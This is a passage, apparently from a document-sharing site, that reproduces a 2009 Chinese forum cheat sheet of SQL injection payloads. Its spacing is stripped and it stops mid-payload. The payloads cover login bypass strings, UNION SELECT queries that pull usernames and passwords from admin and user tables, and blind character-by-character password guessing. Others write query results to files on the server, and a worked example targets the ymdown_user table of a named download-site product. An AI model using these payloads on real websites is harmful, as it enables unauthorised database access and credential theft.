資源描述:
《注入超經(jīng)典語句總結(jié)》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫。
1、注入超經(jīng)典語句總結(jié)(完美版)xiaoshuidi發(fā)表于2009-7-112:25注入經(jīng)典語句總結(jié)'or1=1'or'1=1'/*'%23'andpassword='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1unionselect1,1,1fromadminid=1unionselect1,1,1fromuseruserid=1andpassword=mypassuserid=1
2、andmid(password,3,1)=char(112)userid=1andmid(password,4,1)=char(97)andord(mid(password,3,1))>111(ord函數(shù)很好用,可以返回整形的)'andLENGTH(password)='6(探測(cè)密碼長(zhǎng)度)'andLEFT(password,1)='m'andLEFT(password,2)='my…………………………依次類推'unionselect1,username,passwordfromuser/*'unionselect1,username,pas
3、swordfromuser/*='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)99999'unionselect1,username,passwordfromuser/*'intooutfile'c:/file.txt(導(dǎo)出文件)='or1=1intooutfile'c:/file.txt1'unionselect1,username,passwordfromuserintooutfile'c:/user.txtSELECTpasswordFROMadminsWHERElogin
4、='John'INTODUMPFILE'/path/to/site/file.txt'id='unionselect1,username,passwordfromuserintooutfileid=-1unionselect1,database(),version()(靈活應(yīng)用查詢)綠色兵團(tuán)2009年刊(論壇精選.新兵訓(xùn)練營(yíng))?綠色兵團(tuán)版權(quán)所有常用查詢測(cè)試語句,SELECT*FROMtableWHERE1=1SELECT*FROMtableWHERE'uuu'='uuu'SELECT*FROMtableWHERE1<>2SELECT*FRO
5、MtableWHERE3>2SELECT*FROMtableWHERE2<3SELECT*FROMtableWHERE1SELECT*FROMtableWHERE1+1SELECT*FROMtableWHERE1--1SELECT*FROMtableWHEREISNULL(NULL)SELECT*FROMtableWHEREISNULL(COT(0))SELECT*FROMtableWHERE1ISNOTNULLSELECT*FROMtableWHERENULLISNULLSELECT*FROMtableWHERE2BETWEEN1AND3
6、SELECT*FROMtableWHERE'b'BETWEEN'a'AND'c'SELECT*FROMtableWHERE2IN(0,1,2)SELECT*FROMtableWHERECASEWHEN1>0THEN1END例如:夜貓下載系統(tǒng)1.0版本id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userunionselect1,1,1,1,1,1,1,1,1,1,1,
7、1,1,1,1,1,1,1,1fromymdown_userwhereid=1id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替換,尋找密碼)unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
8、1fromymdown_userwhereid=1andord(mid(password,1,1))=49(驗(yàn)證第一位密碼)unionselect1,1,1,1,1,1,1,1,